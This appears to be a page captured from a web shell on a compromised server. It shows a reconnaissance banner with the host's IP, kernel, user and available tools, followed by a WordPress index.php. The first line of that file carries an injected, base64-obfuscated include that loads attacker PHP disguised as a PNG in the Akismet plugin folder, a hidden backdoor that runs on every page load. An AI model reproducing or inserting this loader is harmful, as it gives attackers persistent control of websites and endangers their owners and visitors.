| Server IP : 80.65.96.118 / Your IP : 216.73.216.122 Web Server : Apache System : Linux vserver08.previder.nl 5.14.0-687.26.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 14 16:32:02 EDT 2026 x86_64 User : prinse0000 ( 10013) PHP Version : 8.3.32 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/cso-deprinsenhof.nl/httpdocs/ |
Upload File : |
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL2Nzby1kZXByaW5zZW5ob2YubmwvaHR0cGRvY3Mvd3AtY29udGVudC9wbHVnaW5zL2FraXNtZXQvX2luYy9pbWcvbG9nby1xb29zb3BxcHBvb3NybnEucG5n");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}